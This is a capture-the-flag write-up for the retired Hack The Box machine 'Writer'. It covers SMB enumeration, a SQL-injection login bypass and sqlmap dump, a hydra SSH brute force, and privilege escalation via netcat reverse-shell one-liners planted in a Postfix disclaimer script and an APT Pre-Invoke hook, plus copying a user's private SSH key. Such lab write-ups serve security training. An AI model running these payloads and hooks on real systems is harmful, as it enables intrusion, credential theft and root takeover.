Hack The Box - Writer Writeup cover image

Hack The Box - Writer Writeup

Antonette Caldwell • September 1, 2021

retired medium sql injection

Machine: Writer

This write-up was last updated January 26, 2022

Completed on September 30, 2021

1. Scan the machine

nmap -Pn -p- --min-rate=1000 -T3 10.10.11.101 -oA Writer
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-26 10:03 EST
Nmap scan report for 10.10.11.101
Host is up (0.057s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 20.32 seconds

2. Vulnerability Analysis

nmap -Pn -sC -sV -p 22,80,139,445 10.10.11.101 -oA WriterServices  
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-26 10:09 EST
Nmap scan report for 10.10.11.101
Host is up (0.061s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 98:20:b9:d0:52:1f:4e:10:3a:4a:93:7e:50:bc:b8:7d (RSA)
|   256 10:04:79:7a:29:74:db:28:f9:ff:af:68:df:f1:3f:34 (ECDSA)
|_  256 77:c4:86:9a:9f:33:4f:da:71:20:2c:e1:51:10:7e:8d (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Story Bank | Writer.HTB
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2022-01-26T15:24:53
|_  start_date: N/A
|_clock-skew: 15m10s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.94 seconds

I added 10.10.11.101 writer.htb to /etc/hosts since there is an open port 80. Here is the landing page.

But first let me check the other ports first, 135 and 449.

smb port 135, 449

To check out the Samba services, you can use a couple of tools, like smbmap and smbclient.

smbmap is possible to use with guest to list out the folders within the server. The permissions set for each of them are no access so I can't access them directly as a guest.

smbmap -u guest -H 10.10.11.101
[+] Guest session       IP: 10.10.11.101:445    Name: writer.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        writer2_project                                         NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (writer server (Samba, Ubuntu))

Let's try smbclient.

smbclient

echo exit | smbclient -L \\\\10.10.11.101                                                                                                                                                                                         127 ⨯
Enter WORKGROUP\kali's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        writer2_project Disk      
        IPC$            IPC       IPC Service (writer server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

Since this was my first time really navigating a system that uses Samba, it took me some research on what to do. However, after a few tries, I ended up using enum4linux which was helpful and put together pretty much what I already saw using other tools.

I used nmblookup. nmblookup is a NetBios over TCP/IP client used to lookup NetBIOS name.

nmblookup -A 10.10.11.101                                        
Looking up status of 10.10.11.101
        WRITER          <00> -         B <ACTIVE> 
        WRITER          <03> -         B <ACTIVE> 
        WRITER          <20> -         B <ACTIVE> 
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> 
        WORKGROUP       <00> - <GROUP> B <ACTIVE> 
        WORKGROUP       <1d> -         B <ACTIVE> 
        WORKGROUP       <1e> - <GROUP> B <ACTIVE> 

        MAC Address = 00-00-00-00-00-00

I also checked to see if I can establish a null login with rpcclient.

rpcclient -U "" -N 10.10.11.101
rpcclient $> enumdomusers
user:[kyle] rid:[0x3e8]
rpcclient $> queryuser 0x3e8
        User Name   :   kyle
        Full Name   :   Kyle Travis
        Home Drive  :   \\writer\kyle
        Dir Drive   :
        Profile Path:   \\writer\kyle\profile
        Logon Script:
        Description :
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      Wed, 31 Dec 1969 19:00:00 EST
        Logoff Time              :      Wed, 06 Feb 2036 10:06:39 EST
        Kickoff Time             :      Wed, 06 Feb 2036 10:06:39 EST
        Password last set Time   :      Tue, 18 May 2021 13:03:35 EDT
        Password can change Time :      Tue, 18 May 2021 13:03:35 EDT
        Password must change Time:      Wed, 13 Sep 30828 22:48:05 EDT
        unknown_2[0..31]...
        user_rid :      0x3e8
        group_rid:      0x201
        acb_info :      0x00000010
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000000
        padding1[0..7]...
        logon_hrs[0..21]...
rpcclient $>

I only looked up enumdomusers and I found kyle. He may prove to be useful later. I went ahead and used enum4linux when all else seems to fail.

enum4linux -a 10.10.11.101                                                                                                                                                                                                        130 ⨯
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jan 26 10:30:35 2022

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.11.101
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.11.101    |
 ==================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================ 
|    Nbtstat Information for 10.10.11.101    |
 ============================================ 
Looking up status of 10.10.11.101
        WRITER          <00> -         B <ACTIVE>  Workstation Service
        WRITER          <03> -         B <ACTIVE>  Messenger Service
        WRITER          <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ===================================== 
|    Session Check on 10.10.11.101    |
 ===================================== 
[+] Server 10.10.11.101 allows sessions using username '', password ''

 =========================================== 
|    Getting domain SID for 10.10.11.101    |
 =========================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ====================================== 
|    OS information on 10.10.11.101    |
 ====================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.11.101 from smbclient: 
[+] Got OS info for 10.10.11.101 from srvinfo:
        WRITER         Wk Sv PrQ Unx NT SNT writer server (Samba, Ubuntu)
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

 ============================= 
|    Users on 10.10.11.101    |
 ============================= 
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: kyle     Name: Kyle Travis       Desc: 

user:[kyle] rid:[0x3e8]

 ========================================= 
|    Share Enumeration on 10.10.11.101    |
 ========================================= 
smbXcli_negprot_smb1_done: No compatible protocol selected by server.

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        writer2_project Disk      
        IPC$            IPC       IPC Service (writer server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.11.101
//10.10.11.101/print$   Mapping: DENIED, Listing: N/A
//10.10.11.101/writer2_project  Mapping: DENIED, Listing: N/A
//10.10.11.101/IPC$     [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ==================================================== 
|    Password Policy Information for 10.10.11.101    |
 ==================================================== 


[+] Attaching to 10.10.11.101 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] WRITER
        [+] Builtin

[+] Password Info for Domain: WRITER

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes 
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes 


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 ============================== 
|    Groups on 10.10.11.101    |
 ============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================= 
|    Users on 10.10.11.101 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-1663171886-1921258872-720408159
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-1663171886-1921258872-720408159 and logon username '', password ''
S-1-5-21-1663171886-1921258872-720408159-500 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-501 WRITER\nobody (Local User)
--snippet--
S-1-5-21-1663171886-1921258872-720408159-513 WRITER\None (Domain Group)
--snippet--
S-1-5-21-1663171886-1921258872-720408159-1000 WRITER\kyle (Local User)
--snippet--
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
--snippet--
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
--snippet--
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kyle (Local User)
S-1-22-1-1001 Unix User\john (Local User)

 ============================================= 
|    Getting printer info for 10.10.11.101    |
 ============================================= 
No printers returned.


enum4linux complete on Wed Jan 26 10:35:14 2022

While I was enumerating the SMB, I went ahead and enumerate the site http://writer.htb as well. Last time when I enumerated the website, I was using dirb and wfuzz. They are useful when other tools don't seem to work. I've been using dirsearch and it is a pretty handy tool.

dirsearch -u http://writer.htb    

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/writer.htb/_22-01-26_10-32-02.txt

Error Log: /home/kali/.dirsearch/logs/errors-22-01-26_10-32-02.log

Target: http://writer.htb/

[10:32:02] Starting: 
[10:32:12] 200 -    3KB - /about                                            
[10:32:18] 200 -    1KB - /administrative                                   
[10:32:24] 200 -    5KB - /contact                                          
[10:32:25] 302 -  208B  - /dashboard  ->  http://writer.htb/                
[10:32:33] 302 -  208B  - /logout  ->  http://writer.htb/                   
[10:32:42] 403 -  275B  - /server-status/                                   
[10:32:42] 403 -  275B  - /server-status                                    
[10:32:44] 301 -  309B  - /static  ->  http://writer.htb/static/            

Task Completed

Nagivating to http://writer.htb/administrative display a Bootstrap login page.

I did notice on the about page, there was a signature Admin @ Writer.HTB. That gives some hint to the elevated username. I wanted to test to see if there were any injection vulnerability. I tried admin ' or '1'='1 and a password. I was able to log in.

The log in page redirected to http://writer.htb/dashboard.

There was a users page, and in the list there is admin with [email protected].

I used sqlmap. I copied the entry from Burp Suite to a file.

POST /administrative HTTP/1.1
Host: writer.htb
Content-Length: 51
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://writer.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://writer.htb/administrative
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

uname=admin&password=password

In order to use sqlmap, I used below.

sqlmap -r request.txt  --dump
        ___
       __H__                                                                                                                                                                                                                                
 ___ ___[,]_____ ___ ___  {1.6#stable}                                                                                                                                                                                                      
|_ -| . [)]     | .'| . |                                                                                                                                                                                                                   
|___|_  ["]_|_|_|__,|  _|                                                                                                                                                                                                                   
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                                

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:40:14 /2022-01-26/

[10:40:14] [INFO] parsing HTTP request from 'request.txt'
[10:40:14] [INFO] testing connection to the target URL
[10:40:14] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:40:14] [INFO] testing if the target URL content is stable
[10:40:14] [INFO] target URL content is stable
[10:40:14] [INFO] testing if POST parameter 'uname' is dynamic
[10:40:15] [WARNING] POST parameter 'uname' does not appear to be dynamic
[10:40:15] [WARNING] heuristic (basic) test shows that POST parameter 'uname' might not be injectable
[10:40:15] [INFO] testing for SQL injection on POST parameter 'uname'
[10:40:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:40:15] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:40:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:40:16] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:40:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[10:40:17] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:40:17] [INFO] testing 'Generic inline queries'
[10:40:17] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
got a refresh intent (redirect like response common to login pages) to '/dashboard'. Do you want to apply it from now on? [Y/n] Y
got a 302 redirect to 'http://writer.htb/'. Do you want to follow? [Y/n] Y
[10:41:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[10:41:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[10:41:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:41:42] [INFO] POST parameter 'uname' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[10:42:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:42:04] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:42:06] [INFO] target URL appears to be UNION injectable with 6 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[10:42:29] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
[10:42:29] [INFO] checking if the injection point on POST parameter 'uname' is a false positive
POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 121 HTTP(s) requests:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=admin' AND (SELECT 8931 FROM (SELECT(SLEEP(5)))syvT) AND 'MHHS'='MHHS&password=password
---
[10:42:51] [INFO] the back-end DBMS is MySQL
[10:42:51] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[10:43:01] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[10:43:01] [INFO] fetching current database
[10:43:01] [INFO] retrieved: 
[10:43:11] [INFO] adjusting time delay to 2 seconds due to good response times
writer
[10:43:49] [INFO] fetching tables for database: 'writer'
[10:43:49] [INFO] fetching number of tables for database 'writer'
[10:43:49] [INFO] retrieved: 3
[10:43:55] [INFO] retrieved: site
[10:44:22] [INFO] retrieved: stories
[10:45:04] [INFO] retrieved: users
[10:45:43] [INFO] fetching columns for table 'users' in database 'writer'
[10:45:43] [INFO] retrieved: 6
[10:45:50] [INFO] retrieved: id
[10:46:03] [INFO] retrieved: username
[10:46:52] [INFO] retrieved: password
[10:47:50] [INFO] retrieved: email
[10:48:19] [INFO] retrieved: status
[10:49:01] [INFO] retrieved: date_created
[10:50:18] [INFO] fetching entries for table 'users' in database 'writer'
[10:50:18] [INFO] fetching number of entries for table 'users' in database 'writer'
[10:50:18] [INFO] retrieved: 1
[10:50:21] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)                                                                                                    
[10:50:34] [INFO] adjusting time delay to 1 second due to good response times

[10:50:38] [INFO] retrieved: [email protected]
[10:51:39] [INFO] retrieved: 1
[10:51:42] [INFO] retrieved: 118e48794631a9612484ca8b55f622d0
[10:53:52] [INFO] retrieved: Active
[10:54:12] [INFO] retrieved: admin
[10:54:29] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[14:17:19] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 
[14:17:23] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] NNN
[14:17:33] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[14:17:33] [INFO] starting 4 processes 
[14:17:41] [WARNING] no clear password(s) found                                                                                                                                                                                            
Database: writer
Table: users
[1 entry]
+----+------------------+--------+----------------------------------+----------+--------------+
| id | email            | status | password                         | username | date_created |
+----+------------------+--------+----------------------------------+----------+--------------+
| 1  | [email protected] | Active | 118e48794631a9612484ca8b55f622d0 | admin    | NULL         |
+----+------------------+--------+----------------------------------+----------+--------------+

Note: While I was able to complete this, apparently it was not needed since I was able to bypass login with sql injection but it is helpful to know that there was a database leak by using sqlmap.

I did notice after I enumerated the SMB shares that there was a user named kyle. I tried to bruteforce the password for the ssh login.

hydra -l kyle -P /usr/share/wordlists/rockyou.txt.gz ssh://writer.htb -VV -f -t 60
--snippet--
[ATTEMPT] target writer.htb - login "kyle" - pass "missing" - 9377 of 14344520 [child 8] (0/121)
[ATTEMPT] target writer.htb - login "kyle" - pass "melrose" - 9378 of 14344520 [child 5] (0/121)
[ATTEMPT] target writer.htb - login "kyle" - pass "marcoantonio" - 9379 of 14344520 [child 47] (0/121)
[ATTEMPT] target writer.htb - login "kyle" - pass "lowell" - 9380 of 14344520 [child 36] (0/121)
[ATTEMPT] target writer.htb - login "kyle" - pass "liljay" - 9381 of 14344520 [child 1] (0/121)
[22][ssh] host: writer.htb   login: kyle   password: marcoantonio
[STATUS] attack finished for writer.htb (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-01-26 11:09:18

So I was able to sign into the server via ssh with kyle login. I found the user.txt.

I checked the user kyle permission.

ssh [email protected]          
The authenticity of host '10.10.11.101 (10.10.11.101)' can't be established.
ED25519 key fingerprint is SHA256:EcmD06Im3Ox+/6cWwJX2eaLFPlgm/TO0Jw20KJK1XSw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.101' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 26 Jan 19:48:38 UTC 2022

  System load:  0.0               Processes:             250
  Usage of /:   64.6% of 6.82GB   Users logged in:       0
  Memory usage: 22%               IPv4 address for eth0: 10.10.11.101
  Swap usage:   0%


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Jul 28 09:03:32 2021 from 10.10.14.19
kyle@writer:~$ id
uid=1000(kyle) gid=1000(kyle) groups=1000(kyle),997(filter),1002(smbgroup)

Now we need to privilege escalate to obtain the root flag.

netstat -punta | grep LISTEN
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::445                  :::*                    LISTEN      -                   
tcp6       0      0 :::139                  :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -

Check other users

cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
kyle:x:1000:1000:Kyle Travis:/home/kyle:/bin/bash
filter:x:997:997:Postfix Filters:/var/spool/filter:/bin/sh
john:x:1001:1001:,,,:/home/john:/bin/bash

Take a note here, you can see that there is a Postfix setup on this server. We can write a python script to send an email to the user we found in the list. Basically we need to setup a shell to get to the user john, since kyle doesn't have much permissions. You can create the file on the target machine.

import smtplib

hostname = "127.0.0.1"
sender_email = "[email protected]"
port = 25
receiver_email = "[email protected]"
message = "Hi! John I need reverse shell"

try:
    server = smtplib.SMTP(hostname, port)
    server.ehlo()
    server.sendmail(sender_email, receiver_email, message)
except Exception as e:
    print(e)
finally:
    server.quit()

Add this to /etc/postfix/disclaimer at the top of the script.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 4444 >/tmp/f

Do a reverse shell and then change to john folder to copy the id_rsa file content to the host machine location.

sudo pwncat -l 10.10.14.14 4444                                                                                                                                               
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(john) gid=1001(john) groups=1001(john)
$ cd /home/john/.ssh
$ ls -al
total 20
drwx------ 2 john john 4096 Jul  9  2021 .
drwxr-xr-x 4 john john 4096 Aug  5 09:56 ..
-rw-r--r-- 1 john john  565 Jul  9  2021 authorized_keys
-rw------- 1 john john 2602 Jul  9  2021 id_rsa
-rw-r--r-- 1 john john  565 Jul  9  2021 id_rsa.pub
$ cat id_rsa

After that, go ahead and ssh to the server.

ssh -i id_rsa [email protected]
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 26 Jan 20:51:35 UTC 2022

  System load:  0.0               Processes:             257
  Usage of /:   64.7% of 6.82GB   Users logged in:       1
  Memory usage: 22%               IPv4 address for eth0: 10.10.11.101
  Swap usage:   0%


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Jul 28 09:19:58 2021 from 10.10.14.19
john@writer:~$

Do another reverse shell within john to /etc/apt/apt.conf.d

echo 'APT::Update::Pre-Invoke: {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 3333 >/tmp/f"};' > /etc/apt/apt.conf.d/shell

Grab the root

sudo pwncat -l 10.10.14.14 3333                                                                                                                                                                      
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# pwd
/tmp
# cd /root
# ls
root.txt
snap